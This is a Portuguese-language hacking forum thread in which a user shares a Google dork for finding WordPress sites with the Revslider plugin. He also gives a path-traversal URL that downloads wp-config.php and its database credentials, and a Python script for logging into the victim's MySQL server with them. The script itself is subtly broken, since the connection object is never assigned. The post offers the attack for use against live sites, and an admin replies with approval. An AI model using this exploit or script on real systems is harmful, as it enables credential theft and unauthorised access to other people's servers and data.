Revslider Exploit

Post Reply
User avatar
PacmanHK#ReturnBSB
Expert
Posts: 4
Joined: Wed Oct 25, 2017 5:08 pm
x 3
x 5

Revslider Exploit

Post by PacmanHK#ReturnBSB » Tue Aug 21, 2018 7:24 pm

Vou compartilhar com vcs uma falha que aprendi ja faz um tempo e afeta muitos sites até hj que funciona executando um código na URL que baixa as configurações MySQL do site alvo, esse arquivo se chama admin-ajax.php e contém informações sobre o server MySQL do site, como por exemplo o usuário e a senha

Dork: revslider.php "index of" (existem outras, porém não lembro mais rs)
Exploit: /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Depois de vcs encontrarem o alvo, vão substituir uma parte da URL pelo exploit e automaticamento irá fazer o download
exemplo: site.com.br/wp-content/plugins/revslider/ (NORMAL)
site.com.br/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php (EXPLOIT)

Image Image
Conectando com Python:

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import MySQLdb
import sys

target = raw_input("HOST: ")
usuario = raw_input("Usuário: ")
senha = raw_input("Senha: ")
#dbname = raw_input("DBName: ") Descomente a linha se quiser definir um banco de dados especifico (em alguns casos é necessario)

#tentando criar uma conexão
try:
MySQLdb.connect(host=target, user=usuario, passwd=senha)
cur = db.cursor()
#executando comandos dentro do servidor
cur.execute(" Digite o comando aqui")

#mostra o resultado do comando
for resultado in cur:
print(resultado)

except Exception as error:
print("Ocorreu algum erro: ", error)
1 x
eu n escolhi ser o escolhido, escolhi ser a escolha

User avatar
admin
CEO
Posts: 57
Joined: Sun Oct 22, 2017 10:00 pm
x 43
x 29

Re: Revslider Exploit

Post by admin » Sat Nov 24, 2018 6:28 pm

Show!
0 x
Image

Post Reply